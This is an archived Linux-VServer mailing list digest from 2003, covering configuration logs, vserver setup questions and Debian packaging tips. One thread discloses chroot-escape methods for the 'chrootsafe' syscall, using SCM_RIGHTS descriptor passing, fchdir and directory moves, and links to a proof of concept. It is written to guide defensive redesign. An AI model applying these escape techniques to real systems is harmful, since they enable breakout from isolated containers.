RE: RE: [Vserver] Rpms for vserver 0.27 (got it)
Hello Guys, Here the log from /var/log/messages (let me know what you think) SSH Secure Shell 3.0.0 (Build 196) Copyright (c) 2000-2001 SSH Communications Security Corp - http://www.ssh.com/ This is a commercial version and requires a license from SSH Communications Security Corp. This program uses RSA BSAFE® Crypto-C by RSA Security Inc. Last login: Mon Nov 24 09:04:36 2003 from 172.16.0.9 [EMAIL PROTECTED] root]# [EMAIL PROTECTED] root]# service named start Starting named: named: capset failed: Operation not permitted [EMAIL PROTECTED] root]# vi /var/log/messages [FAILED] Nov 24 04:33:33 redhat9 syslogd 1.4.1: restart. Nov 24 04:33:33 redhat9 syslog: syslogd startup succeeded Nov 24 04:33:33 redhat9 syslog: klogd startup succeeded Nov 24 04:33:33 redhat9 nscd: nscd startup succeeded Nov 24 04:33:35 redhat9 sshd: RSA1 key generation succeeded Nov 24 04:33:39 redhat9 sshd: RSA key generation succeeded Nov 24 04:34:01 redhat9 sshd: DSA key generation succeeded Nov 24 04:34:01 redhat9 sshd: succeeded Nov 24 04:34:02 redhat9 xinetd[13521]: pmap_set failed. service=sgi_fam program=391002 version=2 Nov 24 04:34:03 redhat9 xinetd[13521]: xinetd Version 2.3.10 started with libwrap options compiled in. Nov 24 04:34:03 redhat9 xinetd[13521]: Started working: 0 available services Nov 24 04:34:05 redhat9 xinetd: xinetd startup succeeded Nov 24 04:34:09 redhat9 httpd: httpd startup succeeded Nov 24 04:34:10 redhat9 crond: crond startup succeeded Nov 24 04:34:28 redhat9 sshd(pam_unix)[13570]: session opened for user root by (uid=0) Nov 24 04:38:30 redhat9 sshd(pam_unix)[13570]: session closed for user root Nov 24 04:38:37 redhat9 sshd(pam_unix)[13683]: session opened for user root by (uid=0) Nov 24 04:42:17 redhat9 sshd(pam_unix)[13683]: session closed for user root Nov 24 04:43:01 redhat9 sshd(pam_unix)[13729]: authentication failure; logname= uid=0 euid=0 tty=NODEVssh ruser= rhost=172.16.0.9 user=root Nov 24 04:50:05 redhat9 sshd(pam_unix)[13732]: session opened for user root by (uid=0) Nov 24 04:58:44 redhat9 sshd(pam_unix)[13732]: session closed for user root Nov 24 04:59:00 redhat9 sshd(pam_unix)[13869]: session opened for user root by (uid=0) Nov 24 05:02:33 redhat9 httpd: httpd shutdown succeeded Nov 24 05:02:33 redhat9 sshd: sshd -TERM succeeded Nov 24 05:02:33 redhat9 xinetd[13521]: Exiting... Nov 24 05:02:33 redhat9 xinetd: xinetd shutdown succeeded Nov 24 05:02:34 redhat9 crond: crond shutdown succeeded Nov 24 05:02:34 redhat9 nscd: nscd shutdown succeeded Nov 24 05:02:34 redhat9 syslog: klogd shutdown failed Nov 24 05:02:34 redhat9 exiting on signal 15 Nov 24 05:02:52 redhat9 syslogd 1.4.1: restart. Nov 24 05:02:52 redhat9 syslog: syslogd startup succeeded Nov 24 05:02:53 redhat9 kernel: klogd 1.4.1, log source = /proc/kmsg started. Nov 24 05:02:53 redhat9 syslog: klogd startup succeeded Nov 24 05:02:53 redhat9 nscd: nscd startup succeeded Nov 24 05:02:53 redhat9 sshd: succeeded Nov 24 05:02:53 redhat9 xinetd[14192]: pmap_set failed. service=sgi_fam program=391002 version=2 Nov 24 05:02:54 redhat9 xinetd[14192]: xinetd Version 2.3.10 started with libwrap options compiled in. Nov 24 05:02:54 redhat9 xinetd[14192]: Started working: 0 available services Nov 24 05:02:56 redhat9 xinetd: xinetd startup succeeded Nov 24 05:03:00 redhat9 httpd: httpd startup succeeded Nov 24 05:03:01 redhat9 crond: crond startup succeeded Nov 24 05:03:25 redhat9 sshd(pam_unix)[14241]: session opened for user root by (uid=0) Nov 24 05:26:28 redhat9 xinetd[14192]: Exiting... Nov 24 05:26:29 redhat9 xinetd: xinetd shutdown succeeded Nov 24 05:26:29 redhat9 xinetd[15573]: pmap_set failed. service=sgi_fam program=391002 version=2 Nov 24 05:26:30 redhat9 xinetd[15573]: xinetd Version 2.3.11 started with libwrap loadavg options compiled in. Nov 24 05:26:30 redhat9 xinetd[15573]: Started working: 0 available services Nov 24 05:26:32 redhat9 xinetd: xinetd startup succeeded Nov 24 05:32:53 redhat9 syslogd 1.4.1: restart. Nov 24 05:32:54 redhat9 qmail: Starting qmail: succeeded Nov 24 05:32:58 redhat9 qmail: qmail-send shutdown succeeded Nov 24 04:33:33 redhat9 syslogd 1.4.1: restart. Nov 24 04:33:33 redhat9 syslog: syslogd startup succeeded Nov 24 04:33:33 redhat9 syslog: klogd startup succeeded Nov 24 04:33:33 redhat9 nscd: nscd startup succeeded Nov 24 04:33:35 redhat9 sshd: RSA1 key generation succeeded Nov 24 04:33:39 redhat9 sshd: RSA key generation succeeded Nov 24 04:34:01 redhat9 sshd: DSA key generation succeeded Nov 24 04:34:01 redhat9 sshd: succeeded Nov 24 04:34:02 redhat9 xinetd[13521]: pmap_set failed. service=sgi_fam program=391002 version=2 Nov 24 04:34:03 redhat9 xinetd[13521]: xinetd Version 2.3.10 started with libwrap options compiled in. Nov 24 04:34:03 redhat9 xinetd[13521]: Started working: 0 available services Nov 24 04:34:05 redhat9 xinetd: xinetd startup succeeded Nov 24 04:34:09 redhat9 httpd: httpd startup succeeded Nov 24 04:34:10 redhat9 crond: crond startup succeeded Nov 24
[Vserver] TCP UDP originate IP in vserver
I'm thinking of moving a radius server from a standalone box to a vserver but need to be sure that the traffic to and from the daemons running in the vserver will use the nominated ip address as the source/destination for all udp and tcp traffic. I remember reading somewhere that TCP was OK but are there still issues with UDP traffic showing as coming from the source ip of the vserver host machine? Cheers ..Petar ___ Vserver mailing list [EMAIL PROTECTED] http://list.linux-vserver.org/mailman/listinfo/vserver
[Vserver] 2 IP-numbers for one vserver
Hello, I would like to move a existing server to a vserver, but the machine does have 2 IP-numbers (on eth0 and eth0:0) Is it possible to have 2 IP-numbers in one vserver? Thanks for you help, Bert. ___ Vserver mailing list [EMAIL PROTECTED] http://list.linux-vserver.org/mailman/listinfo/vserver
Re: [Vserver] 2 IP-numbers for one vserver
On Tue, Nov 25, 2003 at 06:50:47PM +0100, Bert De Vuyst wrote: Hello, I would like to move a existing server to a vserver, but the machine does have 2 IP-numbers (on eth0 and eth0:0) Is it possible to have 2 IP-numbers in one vserver? Yes, i use it right now. JonB ___ Vserver mailing list [EMAIL PROTECTED] http://list.linux-vserver.org/mailman/listinfo/vserver
RE: [Vserver] [Announcement] util-vserver 0.26
Or if you're willing to throw off the .deb stigma, just build everything from source. If you setup some configure scripts like I have in your /usr/src you'll know where each package dumps it's stuff. -Original Message- From: [EMAIL PROTECTED] [mailto:vserver- [EMAIL PROTECTED] On Behalf Of Bert De Vuyst Sent: Tuesday, November 25, 2003 3:23 PM To: [EMAIL PROTECTED] Subject: Re: [Vserver] [Announcement] util-vserver 0.26 On Tuesday 25 November 2003 21:01, ian douglas wrote: But maybe one should package util-vserver and upload it as independant package? Any chance someone has the whole vserver setup in a debian package? I have a very minimal installation (200M or so) on a fresh server of 'woody', and would like to get started with vserver on that system. When I FTP'd to Jacques' site though, he only had RPM's for the vserver-admin package, no source package at all. - Download the vserver source packages for debian testing from a debian mirror - build the packages (this should run out of the box on a debian 3.0) - this wil give you a vserver package for debian 3.0 Download the kernel source form a kernel.org mirror and get the kernel patch from the linux-vserver site. patch the kernel source and configure the kernel compile the kernel using make-kpkg (kernel-package), this will give you a debian package you can install. Reboot your machine Download the script debian-newvserver.sh at the next URL: http://www.paul.sladen.org/vserver/debian/ Customize it a bit to fit your needs (make sure you set the VSERVERS_ROOT) I hope this can help you, Bert. ___ Vserver mailing list [EMAIL PROTECTED] http://list.linux-vserver.org/mailman/listinfo/vserver ___ Vserver mailing list [EMAIL PROTECTED] http://list.linux-vserver.org/mailman/listinfo/vserver
[Vserver] chroot(safe) issues
Hello, on IRC two days ago we had a discussion about secure chroot() implementation. To make it short: it does not exist a such one. The details: the problem of current chroot(2) is that this syscall is not stackable -- on every new chroot(2) invocation the dead zone will be set to a new value and the old one dropped. This fact allows to bypass the chroot by moving into an free directory with 'fchdir(fd)' and go from there with subsequent 'chdir(..)' to the real root. A vserver kernel-patch introduced a new chrootsafe() syscall which tries to prevent the 'fchdir()' part by forbidding open directories as chrootsafe() time. So, the 'fchdir(fd)' can not be executed. Sounds really good and secure on first glance, but kloo_ brought in the idea to transfer filedescriptors via SCM_RIGHTS -- and it works; see http://www.tu-chemnitz.de/~ensc/chrootescape.c (replace vc_chrootsafe() with your own implementation; the actual program uses an experimental syscall which was written by Herbert Poetzl to demonstrate the issue). In attack-mode, this program forks into two processes. The first one calls vc_chrootsafe() to move the dead zone. The second process opens a directory-filedescriptor and transmits it to the first process through SCM_RIGHTS. Now, this process can continue with conventional chroot() methods to come to the real /. Assuming stackable chroots (every chroot() puts the new dead zone into a list which gets processed in vfs_permissions()), the SCM_RIGHTS method can bypass these chroot() also. All you need are two processes within independent chroots which are sharing a filesystem (e.g. /home). The first process moves into the environment of the second one with the already mentioned fchdir() method. Now, it can be moved freely to '..' since the dead zone does not exist there. Another method to escape chrootsafe(), would be the movement of the current directory: one process calls chrootsafe() to move the dead zone, and goes into a directory within the new jail. Now, a second process (started within the old dead zone) moves this directory to a place which is outside of the new dead zone. The cwd-fd of the new process stays in this dir, and on the path to the real '/', the new dead zone will never be reached. Under some circumstances (two processes in independent chroot environments which are sharing a filesystem), this attack works for ordinary users also. Please not that the current 'chmod 000' hack is not affected by this attacks since it is a fixed barrier which can not be bypassed. Therefore, it will not make sense to hope on a magic chrootsafe() syscall for vservers. Alternative approaches like CLONE_NEWNS in combination with pivot_root() or 'mount --rbind vdir /' (suggested by Rik van Riel) must be investigated to find better methods. Enrico ___ Vserver mailing list [EMAIL PROTECTED] http://list.linux-vserver.org/mailman/listinfo/vserver
[Vserver] Combine linux-vserver with UML?
Hello, Is it possible to combine this project with user-mode-linux (user-mode-linux.sf.net)? I am thinking of starting an UML-kernel on the host server an then some vlinux-partitions _inside_ the UML (or the other way round) :-) I imagine it might be possible - maybe itwould be very nice for developing/debugging this great project? Thanks, Frank -- NEU FÜR ALLE - GMX MediaCenter - für Fotos, Musik, Dateien... Fotoalbum, File Sharing, MMS, Multimedia-Gruß, GMX FotoService Jetzt kostenlos anmelden unter http://www.gmx.net +++ GMX - die erste Adresse für Mail, Message, More! +++ ___ Vserver mailing list [EMAIL PROTECTED] http://list.linux-vserver.org/mailman/listinfo/vserver
Re: [Vserver] chroot(safe) issues
Therefore, it will not make sense to hope on a magic chrootsafe() syscall for vservers. Alternative approaches like CLONE_NEWNS in combination with pivot_root() or 'mount --rbind vdir /' (suggested by Rik van Riel) must be investigated to find better methods. I say Rik and Herber - vserver _can`t_ use CLONE_NEWNS and pivot_root because some nmaped files be placed at old root and old root can`t be unmounted. If you have use separated namespace you must write own function to create namespace and fill data. after it process migrate to it. It need modification at kernel but i can`t find other way for correctly work with namespace. If interested see may snapshots. -- With best regards, Alex ___ Vserver mailing list [EMAIL PROTECTED] http://list.linux-vserver.org/mailman/listinfo/vserver
RE: RE: [Vserver] Rpms for vserver 0.27 (got it)
Here it is, Last login: Sun Nov 23 21:53:32 2003 [EMAIL PROTECTED] root]# ls anaconda-ks.cfg install.log install.log.syslog vps [EMAIL PROTECTED] root]# vi /etc/vservers/redhat9.conf # Description: RedHat 9 VPS Server if [ = ]; then PROFILE=prod fi case $PROFILE in prod) # Select the IP number(s) assigned to the virtual server # These IPs will be defined as IP alias # The alias will be setup on IPROOTDEV # You can specify the device if needed # IPROOT=eth0:1.2.3.4 eth1:3.4.5.6 IPROOT=172.16.0.109 # You can define on which device the IP alias will be done # The IP alias will be set when the server is started and unset # when the server is stopped # The netmask and broadcast are computed by default from IPROOTDEV #IPROOTMASK= #IPROOTBCAST= IPROOTDEV=eth0 # You can set a different host name for the vserver # If empty, the host name of the main server is used S_HOSTNAME=redhat9.icanreach.com ;; backup) IPROOT= #IPROOTMASK= #IPROOTBCAST= IPROOTDEV=eth0 S_HOSTNAME= ;; esac # Set ONBOOT to yes or no if you want to enable this # virtual server at boot time ONBOOT=yes # Control the start order of the vservers # Lower value start first PRIORITY=100 # You can set a different NIS domain for the vserver # If empty, the current on is kept # Set it to none to have no NIS domain set S_DOMAINNAME= # You can set the priority level (nice) of all process in the vserver # Even root won't be able to raise it S_NICE= # You can set various flags for the new security context # lock: Prevent the vserver from setting new security context # sched: Merge scheduler priority of all processes in the vserver #so that it acts a like a single one. # nproc: Limit the number of processes in the vserver according to ulimit #(instead of a per user limit, this becomes a per vserver limit) # private: No other process can join this security context. Even root # Do not forget the quotes around the flags S_FLAGS=lock nproc # You can set various ulimit flags and they will be inherited by the # vserver. You enter here various command line argument of ulimit # ULIMIT=-H -u 200 # The example above, combined with the nproc S_FLAGS will limit the # vserver to a maximum of 200 processes ULIMIT=-HS -u 1000 # You can set various capabilities. By default, the vserver are run # with a limited set, so you can let root run in a vserver and not # worry about it. He can\'t take over the machine. In some cases # you can to give a little more capabilities \(such as CAP_NET_RAW\) # S_CAPS=CAP_NET_RAW S_CAPS=CAP_NET_RAW CAP_SYS_ADMIN CAP_NET_ADMIN # Select an unused context (this is optional) # The default is to allocate a free context on the fly # In general you don't need to force a context #S_CONTEXT= From: Charles Dale [EMAIL PROTECTED] Date: 2003/11/25 Tue PM 08:16:37 EST To: [EMAIL PROTECTED] Subject: RE: RE: [Vserver] Rpms for vserver 0.27 (got it) [snip] Nov 24 12:00:13 redhat9 named: named: capset failed: Operation not permitted Nov 24 12:00:13 redhat9 named: named startup failed Looks to me like CAP_SYS_RESOURCE hasn't been enabled for some reason for that vserver. Please post contents of the vserver conf file. BTW, (to list in general), how do I easily find out which caps a particular context has? Chuck ___ Vserver mailing list [EMAIL PROTECTED] http://list.linux-vserver.org/mailman/listinfo/vserver ___ Vserver mailing list [EMAIL PROTECTED] http://list.linux-vserver.org/mailman/listinfo/vserver
Re: [Vserver] Vserver + OpenMosix...
Hi
On Sun, Nov 09, 2003 at 09:48:08AM -, Luís Miguel Silva wrote:
Hello everybody,
I just thought of something!
How about the vserver project united with the openmosix project?
It would be great to be able to have multiple vservers enjoying the
cheerfull'blesses of multi'processing.
One of my servers is a X86 2.6ghz with 512Mb ram running about 6 vservers and it is
*totally* lagged.
It would be great if we could balance the load thru other machines (like we do with
openmosix).
I have had this in mind, even before I found vserver. My first thought was to use
User Mode Linux for this. I have not had much time to work on this. The big problem
is that I have not been able to get openmosix working. The main reason for that
is the lack of boxes to test on. That is fixed now though.
I will continue to work on this and see what I can find out. I heard in some other
thread that it compiles so I'll try to get there first. Later on I'll see how to
patch things so it works well.
I know that mosix is not well suited for IO bound applications. On the other
hand, that is a problem with mosix and not vservers. Vservers should be perfectly
suitable in a cluster environment for computational purposes.
Regards,
// Ola
Best,
+-
| Luís Miguel Silva
| Network Administrator@ ISPGaya.pt
| Rua António Rodrigues da Rocha, 291/341
| Sto. Ovídio 4400-025 V. N. de Gaia
| Portugal
| T: +351 22 3745730/3/5 F: +351 22 3745738
| G: +351 93 6371253 E: [EMAIL PROTECTED]
| H: http://lms.ispgaya.pt/
+-
ÿÿÿÕ±êïz¹X§X¬µ[
®÷«þX¬ÿùbìÿ¾Ç«½êÿ¢¸!¶Úÿÿùb²ÿå{±þû
®÷«þàþf¢f§þX¬¶)ߣûìz»Þ
--
- Ola Lundqvist ---
/ [EMAIL PROTECTED] Annebergsslingan 37 \
| [EMAIL PROTECTED] 654 65 KARLSTAD |
| +46 (0)54-10 14 30 +46 (0)70-332 1551 |
| http://www.opal.dhs.org UIN/icq: 4912500 |
\ gpg/f.p.: 7090 A92B 18FE 7994 0C36 4FE4 18A1 B1CF 0FE5 3DD9 /
---
___
Vserver mailing list
[EMAIL PROTECTED]
http://list.linux-vserver.org/mailman/listinfo/vserver
Re: [Vserver] Combine linux-vserver with UML?
Hi On Wed, Nov 26, 2003 at 04:43:48AM +0100, [EMAIL PROTECTED] wrote: Hello, Is it possible to combine this project with user-mode-linux (user-mode-linux.sf.net)? Should be. I am thinking of starting an UML-kernel on the host server an then some vlinux-partitions _inside_ the UML (or the other way round) :-) I imagine it might be possible - maybe itwould be very nice for developing/debugging this great project? This would be nice (especially for debugging vservers). On the other hand this will probably be solved when 2.6 support is ready. The 2.6 version of the Linux kernel already have UML support. If you want to run UML kernels inside a vserver, that should be no problem (as far as I know) becuase UML is an userland application. Regards, // Ola Thanks, Frank -- NEU F?R ALLE - GMX MediaCenter - f?r Fotos, Musik, Dateien... Fotoalbum, File Sharing, MMS, Multimedia-Gru?, GMX FotoService Jetzt kostenlos anmelden unter http://www.gmx.net +++ GMX - die erste Adresse f?r Mail, Message, More! +++ ___ Vserver mailing list [EMAIL PROTECTED] http://list.linux-vserver.org/mailman/listinfo/vserver -- - Ola Lundqvist --- / [EMAIL PROTECTED] Annebergsslingan 37 \ | [EMAIL PROTECTED] 654 65 KARLSTAD | | +46 (0)54-10 14 30 +46 (0)70-332 1551 | | http://www.opal.dhs.org UIN/icq: 4912500 | \ gpg/f.p.: 7090 A92B 18FE 7994 0C36 4FE4 18A1 B1CF 0FE5 3DD9 / --- ___ Vserver mailing list [EMAIL PROTECTED] http://list.linux-vserver.org/mailman/listinfo/vserver
Re: [Vserver] [Announcement] util-vserver 0.26
Hi On Tue, Nov 25, 2003 at 12:01:03PM -0800, ian douglas wrote: But maybe one should package util-vserver and upload it as independant package? Any chance someone has the whole vserver setup in a debian package? I have a very minimal installation (200M or so) on a fresh server of 'woody', and would like to get started with vserver on that system. When I FTP'd to Jacques' site though, he only had RPM's for the vserver-admin package, no source package at all. Anyone willing to hand-hold me through getting Debian up and running with vserver? ;o) Add deb http://debian.opal.dhs.org/ woody main to your apt sources.list. apt-get install vserver debootstrap apt-get install kernel-image-2.4.20-mppe+ctx+xfs+vlan-386 (or some other arch 686, 686-smp etc). This kernel is used in a lot of production machines so it can be considered stable. Reboot with the new kernel. newvserver --hostname foobar --domain foo.com --ip 192.168.1.1 --arch i386 Soon you can run the new vserver foobar. Regards, // Ola ___ Vserver mailing list [EMAIL PROTECTED] http://list.linux-vserver.org/mailman/listinfo/vserver -- - Ola Lundqvist --- / [EMAIL PROTECTED] Annebergsslingan 37 \ | [EMAIL PROTECTED] 654 65 KARLSTAD | | +46 (0)54-10 14 30 +46 (0)70-332 1551 | | http://www.opal.dhs.org UIN/icq: 4912500 | \ gpg/f.p.: 7090 A92B 18FE 7994 0C36 4FE4 18A1 B1CF 0FE5 3DD9 / --- ___ Vserver mailing list [EMAIL PROTECTED] http://list.linux-vserver.org/mailman/listinfo/vserver
